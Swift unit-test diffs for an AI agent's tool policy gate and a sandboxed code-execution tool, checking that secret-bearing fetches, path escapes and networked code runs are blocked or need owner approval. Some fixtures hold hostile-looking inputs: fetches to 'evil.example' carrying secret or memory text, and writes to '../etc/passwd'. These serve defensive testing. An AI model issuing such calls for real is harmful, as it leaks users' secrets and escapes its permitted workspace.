-    privateFiles: [String] = [ToolPolicyGateTests.memoryText]
+    privateFiles: [String] = [ToolPolicyGateTests.memoryText],
+    execEnabled: Bool = false
   ) -> ToolPolicyGate {
     ToolPolicyGate(
       argGuard: ExfilArgGuard(secretValues: ["s3cret-value-1"]),
-      privateFileLoader: { privateFiles }
+      privateFileLoader: { privateFiles },
+      execEnabled: execEnabled
+    )
+  }
+
+  private func dangerousAction(
+    canonicalArgsJSON: String =
+      #"{"code":"print('hello')","language":"python","network":false,"#
+      + #""readsPrivateData":false,"stage":[]}"#,
+    guardTexts: [String] = ["print('hello')"],
+    canExfiltrate: Bool = false
+  ) -> PreparedToolAction {
+    PreparedToolAction(
+      canonicalTarget: "code_exec:python:0123456789abcdef",
+      canonicalArgsJSON: canonicalArgsJSON,
+      presentation: ToolApprovalPresentation(
+        blastRadius: "run python · egress: no",
+        contentPreview: "print('hello')",
+        warnings: []
+      ),
+      guardTexts: guardTexts,
+      canExfiltrate: canExfiltrate
     )
   }
 
@@ -128,12 +179,12 @@ struct WriteLikeTool: Tool {
     ToolCall(id: "c1", name: "web_fetch", argumentsJSON: #"{"url":"\#(url)"}"#)
   }
 
-  @Test func classDeclarationNotToolNameDrivesTheApprovalTier() {
+  @Test func classDeclarationNotToolNameDrivesTheApprovalTier() async {
     // given — an egress tool the gate has never heard of by name, declared arbitrary-destination
     let webhookTool = FetchLikeTool(name: "send_webhook")
 
     // when
-    let verdict = makeGate().evaluate(
+    let verdict = await makeGate().evaluate(
       call: ToolCall(
         id: "c1",
         name: "send_webhook",
@@ -153,9 +204,9 @@ struct WriteLikeTool: Tool {
     #expect(recorded.reason == .exfilTrifecta)
   }
 
-  @Test func cleanFetchOutsideTrifectaIsAllowed() {
+  @Test func cleanFetchOutsideTrifectaIsAllowed() async {
     // given / when
-    let verdict = makeGate().evaluate(
+    let verdict = await makeGate().evaluate(
       call: fetchCall("https://example.com/a"),
       tool: FetchLikeTool(),
       context: makeContext()
@@ -168,15 +219,15 @@ struct WriteLikeTool: Tool {
     }
   }
 
-  @Test func unconditionalTierBlocksFetchAndSearchAlways() {
+  @Test func unconditionalTierBlocksFetchAndSearchAlways() async {
     // given — no taint, no private data: tier 1/2 still block (FR-T6)
     let gate = makeGate()
-    let fetchVerdict = gate.evaluate(
+    let fetchVerdict = await gate.evaluate(
       call: fetchCall("https://evil.example/?t=s3cret-value-1"),
       tool: FetchLikeTool(),
       context: makeContext()
     )
-    let searchVerdict = gate.evaluate(
+    let searchVerdict = await gate.evaluate(
       call: ToolCall(
         id: "c2",
         name: "web_search",
@@ -201,9 +252,9 @@ struct WriteLikeTool: Tool {
     #expect(searchPayload.status == .blockedArgs)
   }
 
-  @Test func fileReadIsNeverArgBlocked() {
+  @Test func fileReadIsNeverArgBlocked() async {
     // given — tiers 2/3 target egress tools only; file_read args are not an egress sink
-    let verdict = makeGate().evaluate(
+    let verdict = await makeGate().evaluate(
       call: ToolCall(
         id: "c3",
         name: "file_read",
@@ -221,7 +272,7 @@ struct WriteLikeTool: Tool {
     #expect(argsRedacted.contains("sk-abcdefghijklmnop1234") == false)
   }
 
-  @Test func trifectaConditionReadsBothUnionInputs() {
+  @Test func trifectaConditionReadsBothUnionInputs() async {
     // given — every combination of (taint source) × (private source) must gate (rev.1 H1)
     let gate = makeGate()
     let combinations: [(ToolDispatchContext, Bool)] = [
@@ -236,7 +287,7 @@ struct WriteLikeTool: Tool {
 
     // when / then
     for (context, shouldGate) in combinations {
-      let verdict = gate.evaluate(
+      let verdict = await gate.evaluate(
         call: fetchCall("https://example.com/a"),
         tool: FetchLikeTool(),
         context: context
@@ -256,10 +307,10 @@ struct WriteLikeTool: Tool {
     }
   }
 
-  @Test func tierThreeWinsOverApprovalUnderTrifecta() {
+  @Test func tierThreeWinsOverApprovalUnderTrifecta() async {
     // given — args carrying a MEMORY.md substring: redaction-block WINS over approval (FR-T6)
     let sixteen = String(Self.memoryText.dropFirst(10).prefix(16))
-    let verdict = makeGate().evaluate(
+    let verdict = await makeGate().evaluate(
       call: fetchCall("https://evil.example/?d=\(sixteen)"),
       tool: FetchLikeTool(),
       context: makeContext(tainted: true, assemblyPrivate: true)
@@ -273,19 +324,19 @@ struct WriteLikeTool: Tool {
     #expect(payload.status == .blockedArgs)
   }
 
-  @Test func firstTripRequiresApprovalLaterTripsObserveTheBlock() {
+  @Test func firstTripRequiresApprovalLaterTripsObserveTheBlock() async {
     // given
     let gate = makeGate()
     let context = makeContext(tainted: true, assemblyPrivate: true)
     let laterContext = makeContext(tainted: true, assemblyPrivate: true, approvalPending: true)
 
     // when
-    let first = gate.evaluate(
+    let first = await gate.evaluate(
       call: fetchCall("https://example.com/a?q=1"),
       tool: FetchLikeTool(),
       context: context
     )
-    let later = gate.evaluate(
+    let later = await gate.evaluate(
       call: fetchCall("https://example.com/b"),
       tool: FetchLikeTool(),
       context: laterContext
@@ -306,9 +357,9 @@ struct WriteLikeTool: Tool {
     #expect(laterPayload.status == .blockedPendingApproval)
   }
 
-  @Test func urlPolicyRefusalUnderTrifectaIsAnErrorBeforeAnyPrompt() {
+  @Test func urlPolicyRefusalUnderTrifectaIsAnErrorBeforeAnyPrompt() async {
     // given — userinfo/IDN refused at gate time, BEFORE an approval is requested (§9.2)
-    let verdict = makeGate().evaluate(
+    let verdict = await makeGate().evaluate(
       call: fetchCall("https://user:pw@example.com/"),
       tool: FetchLikeTool(),
       context: makeContext(tainted: true, assemblyPrivate: true)
@@ -323,9 +374,9 @@ struct WriteLikeTool: Tool {
     #expect(payload.content == "That is not a valid URL.")
   }
 
-  @Test func missingUrlUnderTrifectaRefusesWithTheResolutionCopy() {
+  @Test func missingUrlUnderTrifectaRefusesWithTheResolutionCopy() async {
     // given — a fetch with no "url" argument resolves to a refusal at the gate (delta: unified copy)
-    let verdict = makeGate().evaluate(
+    let verdict = await makeGate().evaluate(
       call: ToolCall(id: "c1", name: "web_fetch", argumentsJSON: "{}"),
       tool: FetchLikeTool(),
       context: makeContext(tainted: true, assemblyPrivate: true)
@@ -340,7 +391,7 @@ struct WriteLikeTool: Tool {
     #expect(payload.content == #"web_fetch needs a non-empty "url" argument."#)
   }
 
-  @Test func askTierReachesApprovalDespiteNoneEgress() {
+  @Test func askTierReachesApprovalDespiteNoneEgress() async {
     // given — an ask-tier tool whose egress class is .none; the old gate short-circuited every
     // .none tool to .allow before any evaluation (§4.3 breaks that)
     let call = ToolCall(
@@ -350,7 +401,11 @@ struct WriteLikeTool: Tool {
     )
 
     // when
-    let verdict = makeGate().evaluate(call: call, tool: WriteLikeTool(), context: makeContext())
+    let verdict = await makeGate().evaluate(
+      call: call,
+      tool: WriteLikeTool(),
+      context: makeContext()
+    )
 
     // then — reached the durable approval arm on the gate-resolved target, not the fast-path allow
     guard case .requireApproval(let recorded) = verdict else {
@@ -362,7 +417,7 @@ struct WriteLikeTool: Tool {
     #expect(recorded.reason == .askTier)
   }
 
-  @Test func askTierRecordsCanonicalArgsHashAndPresentation() {
+  @Test func askTierRecordsCanonicalArgsHashAndPresentation() async {
     // given
     let call = ToolCall(
       id: "c1",
@@ -371,7 +426,11 @@ struct WriteLikeTool: Tool {
     )
 
     // when
-    let verdict = makeGate().evaluate(call: call, tool: WriteLikeTool(), context: makeContext())
+    let verdict = await makeGate().evaluate(
+      call: call,
+      tool: WriteLikeTool(),
+      context: makeContext()
+    )
 
     // then — canonical args are sorted-keys JSON, the hash is over exactly that string (the
     // approve CAS recomputes it, §6.2 step 5), and the tool's presentation rides along (Task 13)
@@ -385,12 +444,12 @@ struct WriteLikeTool: Tool {
     #expect(recorded.presentation.contentPreview == "hi")
   }
 
-  @Test func askTierRefusedTargetBlocksBeforeApproval() {
+  @Test func askTierRefusedTargetBlocksBeforeApproval() async {
     // given — an ask-tier tool that refuses to resolve a target (as web_fetch does on a bad URL)
     let refusing = WriteLikeTool(resolution: .refused(reason: "path escapes the workspace."))
 
     // when
-    let verdict = makeGate().evaluate(
+    let verdict = await makeGate().evaluate(
       call: ToolCall(id: "c1", name: "file_write", argumentsJSON: #"{"path":"../etc/passwd"}"#),
       tool: refusing,
       context: makeContext()
@@ -405,10 +464,10 @@ struct WriteLikeTool: Tool {
     #expect(payload.content == "path escapes the workspace.")
   }
 
-  @Test func askTierWithAPendingApprovalYieldsTheBlockedObservation() {
+  @Test func askTierWithAPendingApprovalYieldsTheBlockedObservation() async {
     // given — the run's single approval slot is already occupied (§5.2, one pending per run)
     // when
-    let verdict = makeGate().evaluate(
+    let verdict = await makeGate().evaluate(
       call: ToolCall(
         id: "c2",
         name: "file_write",
@@ -426,7 +485,7 @@ struct WriteLikeTool: Tool {
     #expect(payload.status == .blockedPendingApproval)
   }
 
-  @Test func persistedPrivateDataFlagArmsTheTrifectaAndRequiresApproval() throws {
+  @Test func persistedPrivateDataFlagArmsTheTrifectaAndRequiresApproval() async throws {
     // given — taint present; the ONLY private-data source is the persisted session flag (assembly
     // and run legs both false). This is the §12 over-cap gap the flag closes.
     let gate = makeGate()
@@ -438,7 +497,7 @@ struct WriteLikeTool: Tool {
     let context = makeContext(tainted: true, sessionHasPrivate: true)
 
     // when
-    let verdict = gate.evaluate(call: call, tool: FetchLikeTool(), context: context)
+    let verdict = await gate.evaluate(call: call, tool: FetchLikeTool(), context: context)
 
     // then — durable arm, reason exfilTrifecta, target fully resolved
     guard case .requireApproval(let recorded) = verdict else {
@@ -450,7 +509,7 @@ struct WriteLikeTool: Tool {
     #expect(recorded.canonicalTarget == "https://x.example/")
   }
 
-  @Test func trifectaWithoutAnyPrivateLegDoesNotRequireApproval() throws {
+  @Test func trifectaWithoutAnyPrivateLegDoesNotRequireApproval() async throws {
     // given — taint but NO private-data source of any kind
     let gate = makeGate()
     let call = ToolCall(
@@ -461,7 +520,7 @@ struct WriteLikeTool: Tool {
     let context = makeContext(tainted: true)
 
     // when
-    let verdict = gate.evaluate(call: call, tool: FetchLikeTool(), context: context)
+    let verdict = await gate.evaluate(call: call, tool: FetchLikeTool(), context: context)
 
     // then — the fetch is allowed on its resolved target; no approval
     guard case .allow(_, let action) = verdict else {
@@ -471,7 +530,7 @@ struct WriteLikeTool: Tool {
     #expect(action?.target == "https://x.example/")
   }
 
-  @Test func trifectaWithAnApprovalAlreadyPendingBlocksWithoutRequiringAnother() throws {
+  @Test func trifectaWithAnApprovalAlreadyPendingBlocksWithoutRequiringAnother() async throws {
     // given — one pending approval already exists for the run (§5.2)
     let gate = makeGate()
     let call = ToolCall(
@@ -482,7 +541,7 @@ struct WriteLikeTool: Tool {
     let context = makeContext(tainted: true, runPrivate: true, approvalPending: true)
 
     // when
-    let verdict = gate.evaluate(call: call, tool: FetchLikeTool(), context: context)
+    let verdict = await gate.evaluate(call: call, tool: FetchLikeTool(), context: context)
 
     // then — a blocked observation, NOT a second .requireApproval
     guard case .block(let payload, _) = verdict else {
@@ -492,7 +551,7 @@ struct WriteLikeTool: Tool {
     #expect(payload.status == .blockedPendingApproval)
   }
 
-  @Test func restructureKeepsRedactionAheadOfTheTrifectaApproval() {
+  @Test func restructureKeepsRedactionAheadOfTheTrifectaApproval() async {
     // given — a .safe egress tool under trifecta whose args carry a MEMORY.md substring: the
     // ask-tier arm is skipped (safe), so the tier-3 redaction block must still win over the
     // trifecta approval exactly as before the reorder (§5.1(b) — arg-guard/redaction ordering
@@ -500,7 +559,7 @@ struct WriteLikeTool: Tool {
     let sixteen = String(Self.memoryText.dropFirst(10).prefix(16))
 
     // when
-    let verdict = makeGate().evaluate(
+    let verdict = await makeGate().evaluate(
       call: fetchCall("https://evil.example/?d=\(sixteen)"),
       tool: FetchLikeTool(),
       context: makeContext(tainted: true, assemblyPrivate: true)
@@ -512,6 +571,149 @@ struct WriteLikeTool: Tool {
       return
     }
     #expect(payload.status == .blockedArgs)
+  }
+
+  @Test func dangerousToolAlwaysParksItsPreparedCanonicalAction() async {
+    // given
+    let action = dangerousAction()
+    let tool = PreparedDangerousTool(resolution: .prepared(action))
+    let gate = makeGate(execEnabled: true)
+    let call = ToolCall(id: "e1", name: "execute_code", argumentsJSON: #"{"raw":true}"#)
+
+    // when
+    let verdict = await gate.evaluate(call: call, tool: tool, context: makeContext())
+
+    // then
+    guard case .requireApproval(let recorded) = verdict else {
+      Issue.record("expected dangerous approval, got \(verdict)")
+      return
+    }
+    #expect(recorded.canonicalArgsJSON == action.canonicalArgsJSON)
+    #expect(recorded.argsHash == ApprovalArgsHash.sha256Hex(action.canonicalArgsJSON))
+    #expect(recorded.canonicalTarget == action.canonicalTarget)
+    #expect(recorded.reason == .codeExec)
+    #expect(recorded.presentation == action.presentation)
+  }
+
+  @Test func disabledDangerousGateBlocksBeforeApproval() async {
+    // given
+    let tool = PreparedDangerousTool(resolution: .prepared(dangerousAction()))
+    let call = ToolCall(id: "e1", name: "execute_code", argumentsJSON: "{}")
+
+    // when
+    let verdict = await makeGate(execEnabled: false).evaluate(
+      call: call,
+      tool: tool,
+      context: makeContext()
+    )
+
+    // then
+    guard case .block(let payload, _) = verdict else {
+      Issue.record("expected disabled block, got \(verdict)")
+      return
+    }
+    #expect(payload.status == .error)
+    #expect(payload.content.contains("disabled"))
+  }
+
+  @Test func dangerousNilAndRefusedPreparationFailClosed() async {
+    // given
+    let call = ToolCall(id: "e1", name: "execute_code", argumentsJSON: "{}")
+    let gate = makeGate(execEnabled: true)
+
+    // when
+    let missing = await gate.evaluate(
+      call: call,
+      tool: PreparedDangerousTool(resolution: nil),
+      context: makeContext()
+    )
+    let refused = await gate.evaluate(
+      call: call,
+      tool: PreparedDangerousTool(resolution: .refused(reason: "bad stage")),
+      context: makeContext()
+    )
+
+    // then
+    guard case .block(let missingPayload, _) = missing,
+      case .block(let refusedPayload, _) = refused
+    else {
+      Issue.record("expected both preparation failures to block")
+      return
+    }
+    #expect(missingPayload.content.contains("prepared no action"))
+    #expect(refusedPayload.content == "bad stage")
+  }
+
+  @Test func dangerousUnconditionalScanRunsWithoutNetwork() async {
+    // given
+    let encodedSecret = "s3cret%2Dvalue%2D1"
+    let action = dangerousAction(
+      canonicalArgsJSON: #"{"code":"\#(encodedSecret)"}"#,
+      guardTexts: ["contains \(encodedSecret)"],
+      canExfiltrate: false
+    )
+    let tool = PreparedDangerousTool(resolution: .prepared(action))
+
+    // when
+    let verdict = await makeGate(execEnabled: true).evaluate(
+      call: ToolCall(id: "e1", name: "execute_code", argumentsJSON: "{}"),
+      tool: tool,
+      context: makeContext()
+    )
+
+    // then
+    guard case .block(let payload, let argsRedacted) = verdict else {
+      Issue.record("expected exact-secret block, got \(verdict)")
+      return
+    }
+    #expect(payload.status == .blockedArgs)
+    #expect(argsRedacted.contains(encodedSecret) == false)
+  }
+
+  @Test func privateSubstringTierDependsOnlyOnPreparedCanExfiltrate() async {
+    // given
+    let privateText = Self.memoryText
+    let guardTexts = ["send " + String(privateText.prefix(16))]
+    let noNetwork = PreparedDangerousTool(
+      resolution: .prepared(dangerousAction(guardTexts: guardTexts, canExfiltrate: false))
+    )
+    let networked = PreparedDangerousTool(
+      resolution: .prepared(dangerousAction(guardTexts: guardTexts, canExfiltrate: true))
+    )
+    let gate = makeGate(execEnabled: true)
+    let call = ToolCall(id: "e1", name: "execute_code", argumentsJSON: "{}")
+
+    // when
+    let allowedToPark = await gate.evaluate(call: call, tool: noNetwork, context: makeContext())
+    let blocked = await gate.evaluate(call: call, tool: networked, context: makeContext())
+
+    // then
+    guard case .requireApproval = allowedToPark,
+      case .block(let blockedPayload, _) = blocked
+    else {
+      Issue.record("expected no-network park and networked private-substring block")
+      return
+    }
+    #expect(blockedPayload.status == .blockedArgs)
+  }
+
+  @Test func dangerousToolCannotTakeASecondApprovalSlot() async {
+    // given
+    let tool = PreparedDangerousTool(resolution: .prepared(dangerousAction()))
+
+    // when
+    let verdict = await makeGate(execEnabled: true).evaluate(
+      call: ToolCall(id: "e1", name: "execute_code", argumentsJSON: "{}"),
+      tool: tool,
+      context: makeContext(approvalPending: true)
+    )
+
+    // then
+    guard case .block(let payload, _) = verdict else {
+      Issue.record("expected pending-approval block, got \(verdict)")
+      return
+    }
+    #expect(payload.status == .blockedPendingApproval)
   }
 }
 
@@ -525,7 +727,8 @@ struct WriteLikeTool: Tool {
       registry: ToolRegistry(tools: tools),
       gate: ToolPolicyGate(
         argGuard: ExfilArgGuard(secretValues: []),
-        privateFileLoader: { privateFiles }
+        privateFileLoader: { privateFiles },
+        execEnabled: false
       ),
       clock: clock
     )

--- a/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
+++ b/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
@@ -332,3 +332,75 @@ extension ExecuteCodeToolTests {
     #expect(data == nil)
   }
 }
+
+extension ExecuteCodeToolTests {
+  @Test func presentationShowsTheCompleteRedactedScriptAndEveryStage() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    try write(Data("one".utf8), relativePath: "notes/one.txt", workspace: workspace)
+    try write(Data("two".utf8), relativePath: "two.txt", workspace: workspace)
+    let secret = "approval-secret-value"
+    let code = "print('start')\nprint('\(secret)')\nprint('end')"
+    let tool = makeTool(workspace: workspace, secrets: [secret])
+
+    // when
+    let action = try await prepared(
+      tool.prepareAction(
+        arguments: arguments(code: code, stage: ["notes/one.txt", "two.txt"])
+      )
+    )
+    let preview = try #require(action.presentation.contentPreview)
+    let canonicalRoot = try #require(WorkspacePathContainment.canonicalPath(workspace.root.path))
+    let oneHash = SHA256Digest.hex(Data("one".utf8)).prefix(16)
+    let twoHash = SHA256Digest.hex(Data("two".utf8)).prefix(16)
+
+    // then
+    #expect(preview.contains("```python"))
+    #expect(preview.contains("print('start')"))
+    #expect(preview.contains("print('end')"))
+    #expect(preview.contains(secret) == false)
+    #expect(preview.contains(SecretRedactor.replacement))
+    #expect(preview.contains("notes/one.txt"))
+    #expect(preview.contains("two.txt"))
+    #expect(preview.contains("3 B"))
+    #expect(preview.contains(canonicalRoot + "/notes/one.txt"))
+    #expect(preview.contains(canonicalRoot + "/two.txt"))
+    #expect(preview.contains(String(oneHash)))
+    #expect(preview.contains(String(twoHash)))
+    #expect(
+      action.presentation.blastRadius
+        == "run python · egress: no · 4 CPU / 1024 MiB · code \(code.utf8.count) B · 2 staged file(s), 6 B"
+    )
+  }
+
+  @Test func maximumCodePreviewIsNeverTruncated() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    let code = String(repeating: "x", count: ExecuteCodeTool.maxCodeBytes)
+    let tool = makeTool(workspace: workspace)
+
+    // when
+    let action = try await prepared(tool.prepareAction(arguments: arguments(code: code)))
+    let preview = try #require(action.presentation.contentPreview)
+
+    // then
+    #expect(preview.contains(code))
+    #expect(preview.contains(ToolOutputCap.truncationMarker) == false)
+  }
+
+  @Test func networkedPresentationNamesEgressAndWarning() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    let tool = makeTool(workspace: workspace, allowEgress: true)
+
+    // when
+    let action = try await prepared(
+      tool.prepareAction(arguments: arguments(network: true))
+    )
+
+    // then
+    #expect(action.presentation.blastRadius.contains("egress: yes"))
+    #expect(action.presentation.warnings.count == 1)
+    #expect(action.presentation.warnings[0].contains("send data out"))
+  }
+}

--- a/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
+++ b/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
@@ -1,0 +1,334 @@
+import ClawCore
+import ClawTestSupport
+import Foundation
+import Testing
+
+@testable import ClawTools
+
+@Suite struct ExecuteCodeToolTests {
+  private struct Workspace {
+    let root: URL
+    let outside: URL
+  }
+
+  private func makeWorkspace() throws -> Workspace {
+    let base = FileManager.default.temporaryDirectory.appendingPathComponent(
+      "claw-execute-tool-\(UUID().uuidString)",
+      isDirectory: true
+    )
+    let root = base.appendingPathComponent("workspace", isDirectory: true)
+    let outside = base.appendingPathComponent("outside", isDirectory: true)
+    try FileManager.default.createDirectory(at: root, withIntermediateDirectories: true)
+    try FileManager.default.createDirectory(at: outside, withIntermediateDirectories: true)
+    return Workspace(root: root, outside: outside)
+  }
+
+  private func write(_ data: Data, relativePath: String, workspace: Workspace) throws {
+    let destination = workspace.root.appendingPathComponent(relativePath)
+    try FileManager.default.createDirectory(
+      at: destination.deletingLastPathComponent(),
+      withIntermediateDirectories: true
+    )
+    try data.write(to: destination)
+  }
+
+  private func makeTool(
+    workspace: Workspace,
+    backend: FakeExecutionBackend = FakeExecutionBackend(),
+    allowEgress: Bool = false,
+    secrets: [String] = []
+  ) -> ExecuteCodeTool {
+    ExecuteCodeTool(
+      workspaceRoot: workspace.root,
+      backend: backend,
+      settings: ExecuteCodeSettings(
+        memoryMiB: 1024,
+        cpus: 4,
+        timeout: .seconds(30),
+        allowEgress: allowEgress
+      ),
+      redactor: SecretRedactor(secretValues: secrets)
+    )
+  }
+
+  private func arguments(
+    language: String = "python",
+    code: String = "print('hello')",
+    stage: [String] = [],
+    network: Bool = false
+  ) -> JSONValue {
+    .object([
+      "language": .string(language),
+      "code": .string(code),
+      "stage": .array(stage.map(JSONValue.string)),
+      "network": .bool(network),
+    ])
+  }
+
+  private func prepared(_ resolution: PreparedActionResolution?) throws -> PreparedToolAction {
+    guard case .prepared(let action) = resolution else {
+      Issue.record("expected prepared action, got \(String(describing: resolution))")
+      throw PreparationFailure()
+    }
+    return action
+  }
+
+  private func refused(_ resolution: PreparedActionResolution?) -> Bool {
+    guard case .refused = resolution else {
+      return false
+    }
+    return true
+  }
+
+  private struct PreparationFailure: Error {}
+}
+
+extension ExecuteCodeToolTests {
+  @Test func definitionDeclaresTheClosedDangerousSurface() throws {
+    // given
+    let workspace = try makeWorkspace()
+    let tool = makeTool(workspace: workspace)
+
+    // when
+    let definition = tool.definition
+
+    // then
+    #expect(definition.name == "execute_code")
+    #expect(definition.riskLevel == .dangerous)
+    #expect(definition.egressClass == .none)
+  }
+
+  @Test func unknownLanguageAndOversizeCodeRefuse() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    let tool = makeTool(workspace: workspace)
+    let oversize = String(repeating: "x", count: ExecuteCodeTool.maxCodeBytes + 1)
+
+    // when
+    let language = await tool.prepareAction(arguments: arguments(language: "ruby"))
+    let code = await tool.prepareAction(arguments: arguments(code: oversize))
+
+    // then
+    #expect(refused(language))
+    #expect(refused(code))
+  }
+
+  @Test func rawOptionalDefaultsAreExplicitAndWrongTypesRefuse() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    let tool = makeTool(workspace: workspace)
+    let minimal: JSONValue = .object([
+      "language": .string("sh"),
+      "code": .string("echo hello"),
+    ])
+    let badStage: JSONValue = .object([
+      "language": .string("sh"),
+      "code": .string("echo hello"),
+      "stage": .string("notes.txt"),
+    ])
+    let badNetwork: JSONValue = .object([
+      "language": .string("sh"),
+      "code": .string("echo hello"),
+      "network": .string("false"),
+    ])
+
+    // when
+    let action = try await prepared(tool.prepareAction(arguments: minimal))
+    let recorded = try #require(JSONValue.parse(action.canonicalArgsJSON)?.objectValue)
+    let stage = await tool.prepareAction(arguments: badStage)
+    let network = await tool.prepareAction(arguments: badNetwork)
+
+    // then
+    #expect(recorded["language"] == .string("sh"))
+    #expect(recorded["network"] == .bool(false))
+    #expect(recorded["readsPrivateData"] == .bool(false))
+    #expect(recorded["stage"] == .array([]))
+    #expect(action.canonicalTarget.hasPrefix("code_exec:sh:"))
+    #expect(refused(stage))
+    #expect(refused(network))
+  }
+
+  @Test func absoluteDotDotAndSymlinkEscapesRefuse() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    try "outside".write(
+      to: workspace.outside.appendingPathComponent("secret.txt"),
+      atomically: true,
+      encoding: .utf8
+    )
+    try FileManager.default.createSymbolicLink(
+      at: workspace.root.appendingPathComponent("escape.txt"),
+      withDestinationURL: workspace.outside.appendingPathComponent("secret.txt")
+    )
+    let tool = makeTool(workspace: workspace)
+
+    // when
+    let absolute = await tool.prepareAction(
+      arguments: arguments(stage: [workspace.outside.appendingPathComponent("secret.txt").path])
+    )
+    let dotDot = await tool.prepareAction(arguments: arguments(stage: ["../outside/secret.txt"]))
+    let symlink = await tool.prepareAction(arguments: arguments(stage: ["escape.txt"]))
+    let missing = await tool.prepareAction(arguments: arguments(stage: ["missing.txt"]))
+
+    // then
+    #expect(refused(absolute))
+    #expect(refused(dotDot))
+    #expect(refused(symlink))
+    #expect(refused(missing))
+  }
+
+  @Test func directoriesAndExceededStageCapsRefuse() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    try FileManager.default.createDirectory(
+      at: workspace.root.appendingPathComponent("folder"),
+      withIntermediateDirectories: true
+    )
+    try write(
+      Data(repeating: 0x61, count: ExecuteCodeTool.maxStagedFileBytes + 1),
+      relativePath: "large.bin",
+      workspace: workspace
+    )
+    let countPaths = (0...ExecuteCodeTool.maxStagedFiles).map { index in
+      "count-\(index).txt"
+    }
+    for path in countPaths {
+      try write(Data("x".utf8), relativePath: path, workspace: workspace)
+    }
+    let totalPaths = (0..<4).map { index in
+      "total-\(index).bin"
+    }
+    for path in totalPaths {
+      try write(
+        Data(repeating: 0x62, count: ExecuteCodeTool.maxStagedFileBytes),
+        relativePath: path,
+        workspace: workspace
+      )
+    }
+    try write(Data([0x63]), relativePath: "total-over.bin", workspace: workspace)
+    let tool = makeTool(workspace: workspace)
+
+    // when
+    let directory = await tool.prepareAction(arguments: arguments(stage: ["folder"]))
+    let perFile = await tool.prepareAction(arguments: arguments(stage: ["large.bin"]))
+    let count = await tool.prepareAction(arguments: arguments(stage: countPaths))
+    let total = await tool.prepareAction(
+      arguments: arguments(stage: totalPaths + ["total-over.bin"])
+    )
+
+    // then
+    #expect(refused(directory))
+    #expect(refused(perFile))
+    #expect(refused(count))
+    #expect(refused(total))
+  }
+
+  @Test func networkNeedsTheOwnerConfigSwitch() async throws {
+    // given
+    let workspace = try makeWorkspace()
+
+    // when
+    let blocked = await makeTool(workspace: workspace).prepareAction(
+      arguments: arguments(network: true)
+    )
+    let enabled = await makeTool(workspace: workspace, allowEgress: true).prepareAction(
+      arguments: arguments(network: true)
+    )
+
+    // then
+    #expect(refused(blocked))
+    #expect(try prepared(enabled).canExfiltrate)
+  }
+
+  @Test func normalizedDuplicateAndReservedBasenamesRefuse() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    try write(Data("a".utf8), relativePath: "A.txt", workspace: workspace)
+    try write(Data("b".utf8), relativePath: "a.TXT", workspace: workspace)
+    try write(Data("c".utf8), relativePath: ".CLAWD-ENTRYPOINT.PY", workspace: workspace)
+    try write(Data("d".utf8), relativePath: "résumé.txt", workspace: workspace)
+    try write(
+      Data("e".utf8),
+      relativePath: "re\u{301}sume\u{301}.txt",
+      workspace: workspace
+    )
+    let tool = makeTool(workspace: workspace)
+
+    // when
+    let duplicate = await tool.prepareAction(arguments: arguments(stage: ["A.txt", "a.TXT"]))
+    let reserved = await tool.prepareAction(
+      arguments: arguments(stage: [".CLAWD-ENTRYPOINT.PY"])
+    )
+    let unicodeDuplicate = await tool.prepareAction(
+      arguments: arguments(stage: ["résumé.txt", "re\u{301}sume\u{301}.txt"])
+    )
+
+    // then
+    #expect(refused(duplicate))
+    #expect(refused(reserved))
+    #expect(refused(unicodeDuplicate))
+  }
+
+  @Test func preparedJSONBindsEveryStageAndPrivateClassification() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    try write(Data("input text".utf8), relativePath: "notes/input.txt", workspace: workspace)
+    try write(Data("private text".utf8), relativePath: "MEMORY.md", workspace: workspace)
+    let tool = makeTool(workspace: workspace)
+    let canonicalRoot = try #require(WorkspacePathContainment.canonicalPath(workspace.root.path))
+
+    // when
+    let action = try await prepared(
+      tool.prepareAction(
+        arguments: arguments(stage: ["notes/input.txt", "MEMORY.md"])
+      )
+    )
+    let decoded = try #require(JSONValue.parse(action.canonicalArgsJSON)?.objectValue)
+    guard case .array(let stages) = decoded["stage"] else {
+      Issue.record("recorded stage was not an array")
+      return
+    }
+    let inputStage = try #require(
+      stages.first { stage in
+        stage.objectValue?["path"] == .string("notes/input.txt")
+      }?.objectValue
+    )
+    let memoryStage = try #require(
+      stages.first { stage in
+        stage.objectValue?["path"] == .string("MEMORY.md")
+      }?.objectValue
+    )
+
+    // then
+    #expect(stages.count == 2)
+    #expect(decoded["network"] == .bool(false))
+    #expect(decoded["readsPrivateData"] == .bool(true))
+    #expect(action.guardTexts == ["print('hello')", "input text", "private text"])
+    #expect(action.canExfiltrate == false)
+    let hashPrefix = ApprovalArgsHash.sha256Hex(action.canonicalArgsJSON).prefix(16)
+    #expect(action.canonicalTarget == "code_exec:python:\(hashPrefix)")
+    #expect(inputStage["bytes"]?.numberValue == 10)
+    #expect(inputStage["sha256"] == .string(SHA256Digest.hex(Data("input text".utf8))))
+    #expect(memoryStage["bytes"]?.numberValue == 12)
+    #expect(memoryStage["sha256"] == .string(SHA256Digest.hex(Data("private text".utf8))))
+    for stage in stages {
+      let object = try #require(stage.objectValue)
+      #expect(object["realpath"]?.stringValue?.hasPrefix(canonicalRoot + "/") == true)
+      #expect(object["sha256"]?.stringValue?.count == 64)
+      #expect(object["bytes"]?.numberValue != nil)
+    }
+  }
+
+  @Test func boundedReaderRefusesOneBytePastItsLimit() throws {
+    // given
+    let workspace = try makeWorkspace()
+    let path = workspace.root.appendingPathComponent("race.bin").path
+    try Data(repeating: 0x61, count: 33).write(to: URL(fileURLWithPath: path))
+
+    // when
+    let data = try ExecuteCodeTool.readBoundedFile(atPath: path, maxBytes: 32)
+
+    // then
+    #expect(data == nil)
+  }
+}

--- a/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
+++ b/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
@@ -710,3 +710,62 @@ extension ExecuteCodeToolTests {
     #expect(payload.readPrivateData)
   }
 }
+
